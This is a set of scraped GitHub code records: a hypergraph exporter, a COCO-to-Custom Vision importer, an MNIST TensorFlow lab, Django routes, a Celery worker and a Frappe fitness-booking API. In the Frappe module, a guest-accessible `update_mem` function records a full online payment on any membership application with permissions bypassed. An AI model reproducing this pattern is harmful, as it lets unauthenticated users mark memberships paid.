+{"seq_id": "29128693179", "text": "import json\n\nfrom graphbrain import hgraph\n\n\ndef run(args):\n print('exporting hypergraph...')\n hg = hgraph(args.hg)\n n = 0\n with open(args.outfile, 'w') as f:\n for edge, attributes in hg.all_attributes():\n row = [edge.to_str(), attributes]\n f.write('{}\\n'.format(\n json.dumps(row, ensure_ascii=False)))\n n += 1\n print('{} edges exported.'.format(n))\n", "repo_name": "codeaudit/graphbrain", "sub_path": "graphbrain/commands/export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphbrain.hgraph", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "17416543573", "text": "from .integration import (\n get_category_id_to_tag_id_dictionary,\n image_annotations_to_region,\n)\nfrom .azure_blob import download_json, get_container_sas_token\nfrom tqdm import tqdm\nfrom azure.cognitiveservices.vision.customvision.training.models import (\n ImageUrlCreateEntry,\n)\n\n\ndef import_coco_to_custom_vision(\n custom_vision_client,\n custom_vision_project,\n blob_container_client,\n storage_path,\n coco_file_name,\n):\n # Read coco dataset definition\n file_name = coco_file_name\n if storage_path is not None and len(storage_path) > 0:\n file_name = f\"{storage_path}{coco_file_name}\"\n coco_dataset = download_json(blob_container_client, file_name)\n\n category_id_to_tag_id_dictionary = get_category_id_to_tag_id_dictionary(\n coco_dataset, custom_vision_client, custom_vision_project\n )\n\n container_sas_token = get_container_sas_token(blob_container_client)\n\n images_to_upload = []\n for image in tqdm(\n coco_dataset[\"images\"],\n ascii=True,\n desc=\"Preparing coco images\",\n ):\n image_url = f\"{image['coco_url']}?{container_sas_token}\"\n regions = image_annotations_to_region(\n coco_dataset[\"annotations\"], image, category_id_to_tag_id_dictionary\n )\n images_to_upload.append(ImageUrlCreateEntry(url=image_url, regions=regions))\n\n custom_vision_client.upload_images_from_url(custom_vision_project, images_to_upload)\n", "repo_name": "rndazurescript/Coco2CustomVision", "sub_path": "src/coco2customvision/import_coco.py", "file_name": "import_coco.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "azure_blob.download_json", "line_number": 23, "usage_type": "call"}, {"api_name": "integration.get_category_id_to_tag_id_dictionary", "line_number": 25, "usage_type": "call"}, {"api_name": "azure_blob.get_container_sas_token", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "integration.image_annotations_to_region", "line_number": 38, "usage_type": "call"}, {"api_name": "azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "7053299679", "text": "# Lab 9-MNIST\n# Made by: Jinmin Goh\n# Date: 20200306\n\n# MNIST dataset wide deep NN model with tensorboard\n# Acc: 94.2%\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\ntf.set_random_seed(777) # for reproducibility\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n#MNIST_size = 784\n#hidden_size = 20\n\nX = tf.placeholder(tf.float32, [None, 784])\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n# layer 1: weight number same with MNIST_size\nwith tf.name_scope(\"Layer1\"):\n W1 = tf.Variable(tf.random_normal([784, 128]), name='weight1')\n b1 = tf.Variable(tf.random_normal([128]), name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n # histogram\n tf.summary.histogram(\"W1\", W1)\n tf.summary.histogram(\"b1\", b1)\n tf.summary.histogram(\"Layer1\", layer1)\n# layer 2: hidden layer\nwith tf.name_scope(\"Layer2\"):\n W2 = tf.Variable(tf.random_normal([128, 32]), name='weight2')\n b2 = tf.Variable(tf.random_normal([32]), name='bias2')\n layer2 = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n tf.summary.histogram(\"W2\", W2)\n tf.summary.histogram(\"b2\", b2)\n tf.summary.histogram(\"Layer2\", layer2)\n# layer 3: hidden layer\nwith tf.name_scope(\"Layer3\"):\n W3 = tf.Variable(tf.random_normal([32, 16]), name='weight3')\n b3 = tf.Variable(tf.random_normal([16]), name='bias3')\n layer3 = tf.sigmoid(tf.matmul(layer2, W3) + b3)\n tf.summary.histogram(\"W3\", W3)\n tf.summary.histogram(\"b3\", b3)\n tf.summary.histogram(\"Layer3\", layer3)\n# layer 4: 10 classifications\nwith tf.name_scope(\"Layer4\"):\n W4 = tf.Variable(tf.random_normal([16, nb_classes]), name='weight4')\n b4 = tf.Variable(tf.random_normal([nb_classes]), name='bias4')\n hypothesis = tf.nn.softmax(tf.matmul(layer3, W4) + b4)\n tf.summary.histogram(\"W3\", W4)\n tf.summary.histogram(\"b3\", b4)\n tf.summary.histogram(\"Hypothesis\", hypothesis)\n\n# Cross entropy\nwith tf.name_scope(\"Cost\"):\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n tf.summary.scalar(\"Cost\", cost)\nwith tf.name_scope(\"Train\"):\n train = tf.train.GradientDescentOptimizer(learning_rate = 1).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\ntf.summary.scalar(\"Accuracy\", accuracy)\n\n# parameters\nnum_epochs = 15 # training count of entinre training data\nbatch_size = 100 # splitting size of whole dataset\nnum_iterations = int(mnist.train.num_examples / batch_size)\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/MNIST\")\n writer.add_graph(sess.graph)\n sess.run(tf.global_variables_initializer())\n # Training cycle\n for epoch in range(num_epochs):\n avg_cost = 0\n for i in range(num_iterations):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary, cost_val = sess.run([train, merged_summary, cost], feed_dict={X: batch_xs, Y: batch_ys})\n avg_cost += cost_val / num_iterations\n writer.add_summary(summary, global_step = i + epoch * num_iterations)\n print(\"Epoch: {:04d}, Cost: {:.9f}\".format(epoch + 1, avg_cost))\n print(\"Learning finished\")\n # Test the model using test sets\n print(\n \"Accuracy: \",\n 
accuracy.eval(\n session=sess, feed_dict={X: mnist.test.images, Y: mnist.test.labels}\n ),\n )\n # Get one and predict\n r = random.randint(0, mnist.test.num_examples - 1)\n print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r : r + 1], 1)))\n print(\n \"Prediction: \",\n sess.run(tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r : r + 1]}),\n )\n plt.imshow(\n mnist.test.images[r : r + 1].reshape(28, 28),\n cmap=\"Greys\",\n interpolation=\"nearest\",\n )\n plt.show()\n\n", "repo_name": "Jinmin-Goh/DeepLearningPractice", "sub_path": "Lab/Lab9/Lab9-MNIST.py", "file_name": "Lab9-MNIST.py", "file_ext": "py", "file_size_in_byte": 4128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 40, "usage_type": "attribute"}, {"api_name": 
"tensorflow.name_scope", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 76, "usage_type": 
"call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}]}
+{"seq_id": "14127294857", "text": "from django import views\nfrom django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path('',views.index, name='index'), #uses \"from . import views\"\n path('login/',views.login, name='login'),\n path('register/',views.register, name='register'),\n path('products/',views.products, name='products'),\n path('single/',views.single, name='single'),\n path('add-to-cart/',views.add_to_cart, name='add-to-cart'),\n path('cart/',views.cart, name='cart'),\n path('delete-cart/',views.delete_cart,name='delete-cart'),\n path('checkout/',views.checkout,name='checkout'),\n path('success/',views.success,name='success'),\n]\n", "repo_name": "ankitpatelcs/EcomDjangoProject", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.login", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.register", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.views.products", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.views.single", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.views.add_to_cart", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.views.cart", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.views.delete_cart", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.views.checkout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.success", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "75297970408", "text": "import os\nimport importlib\nimport typing as t\n\nimport numpy as np\nfrom celery import Celery, states\nfrom celery.exceptions import Ignore\n\n\ncelery = Celery(__name__)\nREDIS_URL = \"redis://{host}:{port}/0\".format(\n host=os.getenv('REDIS_HOST', 'localhost'),\n port=os.getenv('REDIS_PORT', '6379')\n)\ncelery.conf.broker_url = REDIS_URL\ncelery.conf.result_backend = REDIS_URL\n\n\n@celery.task(bind=True, name='tasks.vectorize_text')\ndef vectorize_text(self, text: str) -> t.List[float]:\n # Lazy import!\n # If TextVectorizer is imported globally,\n # you shuold install large dependencies (like torch) to FastAPI container. \n text_vectorizer = importlib.import_module('src.ml.text_vectorizer')\n\n text = text[:256] if len(text) >= 256 else text\n try:\n res = text_vectorizer.TextVectorizer.vectorize(text)\n if isinstance(res, np.ndarray):\n res = res.tolist()\n return res\n except Exception as e:\n self.update_state(\n state = states.FAILURE,\n meta = e\n )\n raise Ignore()\n ", "repo_name": "fyk7/text-vectorizer-k8s", "sub_path": "src/worker/worker.py", "file_name": "worker.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "celery.conf", "line_number": 16, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 29, "usage_type": "attribute"}, {"api_name": "celery.states.FAILURE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "celery.states", "line_number": 34, "usage_type": "name"}, {"api_name": "celery.exceptions.Ignore", "line_number": 37, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "33956342074", "text": "import frappe\nfrom frappe.website.utils import is_signup_enabled\nfrom frappe.utils import escape_html\nfrom frappe.utils import getdate, get_time, flt, now_datetime\nfrom club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment import cancel_appointment_online\nfrom datetime import datetime, timedelta, date, time\nfrom frappe import throw, msgprint, _\nfrom club_crm.api.wallet import get_balance\n\n@frappe.whitelist()\ndef get_fitness_category(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if not client.status == \"Disabled\":\n doc = frappe.get_all('Fitness Training Request', filters={'client_id':client.name, 'request_status':['in', {'Pending','Scheduled'}]}, fields=['*'])\n if doc:\n for doc_1 in doc:\n if doc_1.request_status==\"Pending\":\n frappe.response[\"message\"] = {\n \"Status\":0,\n \"Status Message\": \"A pending request exists\",\n \"Document ID\" : doc_1.name\n }\n else:\n schedule=frappe.get_list('Fitness Training Trainer Scheduler', filters={'parent':doc_1.name,'parentfield':'table_schedule'}, fields=['day','date','from_time','to_time'], order_by=\"date asc\")\n \n frappe.response[\"message\"] = {\n \"Status\":1,\n \"disabled\": 0,\n \"Status Message\": \"Training has been scheduled\",\n \"Document ID\": doc_1.name,\n \"rate\": doc_1.price,\n \"package_name\": doc_1.fitness_package,\n \"Number of Sessions\": doc_1.number_of_sessions,\n \"Schedule\": schedule\n }\n else:\n fitness_category = frappe.get_all('Fitness Services', filters={'on_app': 1}, fields=['fitness_name','image'])\n fitness_item = []\n for item in fitness_category:\n fitness_item.append({\n \"category_name\" : item.fitness_name,\n \"category_image\" : item.image\n })\n frappe.response[\"message\"] = {\n \"Status\":2,\n \"disabled\": 0,\n \"Fitness Categories\": fitness_item\n }\n else:\n frappe.response[\"message\"] = {\n \"Status\":3,\n \"disabled\": 1\n }\n\n@frappe.whitelist()\ndef get_fitness_package(fitness_category):\n fit_category = frappe.get_doc('Fitness Services', fitness_category)\n all_fitness_package = frappe.get_all('Club Packages', filters={'on_app': 1, 'package_type': 'Fitness'})\n packages = []\n for item in all_fitness_package:\n single_package = frappe.get_doc('Club Packages', item.name)\n for package in single_package.package_table:\n if package.service_name == fitness_category:\n sessions = int(package.no_of_sessions/4)\n if sessions == 0:\n sessions = 1\n validity = int(package.validity // (24 * 3600))\n packages.append({\n \"name\": item.name,\n \"duration\": int(fit_category.duration),\n \"no_of_session\": package.no_of_sessions,\n \"validity\": validity,\n \"sessions_per_week\": sessions,\n \"price\": package.price,\n \"fitness_category\": fitness_category\n })\n \n frappe.response[\"message\"] = {\n \"Fitness Categories\": packages\n }\n\n@frappe.whitelist()\ndef get_trainer(fitness_package,client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n club_package = frappe.get_doc('Club Packages', fitness_package)\n for package in club_package.package_table:\n fit_trainer = frappe.get_all('Fitness Services Assignment', filters={'fitness_package': package.service_name, 'on_app':1}, fields=['name','parent','parenttype','parentfield','gender_preference'])\n trainers = []\n for trainer in fit_trainer:\n doc_1 = frappe.get_doc('Service Staff', trainer.parent)\n if doc_1.on_app == 1:\n if trainer.gender_preference == \"Same Gender\":\n if doc_1.gender == 
client.gender:\n trainers.append({\n 'Trainer': doc_1.display_name,\n 'Description': doc_1.description,\n 'Image': doc_1.image,\n 'Gender': doc_1.gender\n })\n elif trainer.gender_preference == \"No Preference\":\n trainers.append({\n \"Trainer\": doc_1.display_name,\n \"Description\": doc_1.description,\n \"Image\": doc_1.image,\n \"Gender\": doc_1.gender\n })\n return trainers\n\n@frappe.whitelist()\ndef get_pt_appointments():\n rating_point = -1\n disabled = 0\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if client.status == \"Disabled\":\n disabled = 1\n time = frappe.get_doc('Fitness Training Settings')\n\n sessions = []\n client_session_list = frappe.get_all('Client Sessions', filters={'client_id': client.name, 'session_status': 'Active', 'package_type': 'Fitness'}, order_by=\"expiry_date asc\")\n if client_session_list:\n for client_session in client_session_list:\n client_session_doc = frappe.get_doc('Client Sessions', client_session.name)\n sessions.append({\n 'package_name': client_session_doc.package_name,\n 'expiry_date' : client_session_doc.expiry_date,\n 'used_sessions': client_session_doc.used_sessions,\n 'remaining_sessions': client_session_doc.remaining_sessions\n })\n\n details=[]\n pt_list = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','start_time'], order_by=\"appointment_date asc\")\n if pt_list:\n for pt in pt_list:\n pt_doc = frappe.get_doc('Fitness Training Appointment', pt.name)\n cancel_time = pt_doc.start_time - timedelta(seconds=int(time.pt_cancellation_time))\n start_date = pt_doc.start_time.date()\n\n rating_list = frappe.get_all('Rating', filters={'document_id':pt.name}, fields=['rating_point'])\n if rating_list:\n for rating in rating_list:\n rating_point = rating.rating_point\n details.append({\n \"name\": pt_doc.name,\n \"date\": start_date,\n \"client_id\" : pt_doc.client_id,\n \"client_name\": pt_doc.client_name,\n \"package_name\": pt_doc.fitness_service,\n \"trainer_name\": pt_doc.service_staff,\n \"status\": pt_doc.appointment_status,\n \"start_time\": pt_doc.start_time,\n \"end_time\": pt_doc.end_time,\n \"payment_status\": pt_doc.payment_status,\n \"cancellation_time\" : cancel_time,\n \"rating\": rating_point\n })\n\n frappe.response[\"message\"] = {\n \"disabled\": disabled,\n \"pt_appointments\": details,\n \"packages\": sessions\n }\n\n@frappe.whitelist()\ndef get_appointments(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n doc = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','booking_date','client_id','client_name','fitness_service','service_staff','appointment_status','start_time','end_time','payment_status'], order_by=\"appointment_date asc\")\n details=[]\n if doc:\n for rating in doc:\n # start_time = datetime.strftime(rating.start_time, \"%H:%M:%S\")\n # end_time = datetime.strftime(rating.end_time, \"%H:%M:%S\")\n start_date = rating.start_time.date()\n\n rate=frappe.get_all('Rating', filters={'document_id':rating.name}, fields=['rating_point'])\n #cancel_time = rating.start_time - timedelta(seconds=int(time.spa_cancel_time))\n if rate:\n rate=rate[0]\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n 
\"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': rate.rating_point,\n })\n else:\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': -1,\n })\n return details\n\n@frappe.whitelist()\ndef cancel_request(doc_id):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n frappe.db.set_value('Fitness Training Request', doc_id, {\n 'request_status': 'Cancelled',\n 'docstatus': 2\n })\n doc.reload()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Request has been cancelled\"\n }\n # else:\n # frappe.response[\"message\"] = {\n # \"status\": 0,\n # \"status_message\": \"Fitness Training Appointmnent already cancelled\"\n # }\n\n@frappe.whitelist()\ndef cancel_session(appointment_id):\n doc = cancel_appointment_online(appointment_id)\n if doc == 1:\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Appointment has been cancelled\"\n }\n else:\n frappe.response[\"message\"] = {\n \"status\": 0,\n \"status_message\": \"Fitness Training Appointment already cancelled\"\n }\n\n@frappe.whitelist()\ndef proceed_payment(client_id,doc_id, payment_method):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n # doc.payment_method= payment_method\n # doc.save()\n # cart = add_cart_from_pt_online(doc.client_id, doc.name)\n wallet= get_balance()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"document_name\": doc.name,\n \"wallet_balance\": wallet\n }\n\n@frappe.whitelist(allow_guest=True)\ndef update_mem(doc_id):\n doc = frappe.get_doc(\"Memberships Application\", doc_id)\n doc.append('membership_payment', {\n \"mode_of_payment\": \"Online Payment\",\n \"paid_amount\": doc.grand_total\n\t\t})\n doc.save(ignore_permissions=True)", "repo_name": "VivekChamp/clubcrm", "sub_path": "club_crm/api/app/fitness.py", "file_name": "fitness.py", "file_ext": "py", "file_size_in_byte": 11512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "frappe.db.get", "line_number": 12, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 18, "usage_type": "attribute"}, {"api_name": "frappe.get_list", "line_number": 24, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 26, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 37, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 44, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 50, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 10, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 57, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 58, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 61, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 78, "usage_type": 
"attribute"}, {"api_name": "frappe.whitelist", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 84, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 85, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 87, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 90, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 82, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 113, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 113, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 116, "usage_type": "name"}, {"api_name": "frappe.get_doc", "line_number": 116, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 119, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 122, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.time.pt_cancellation_time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.time", 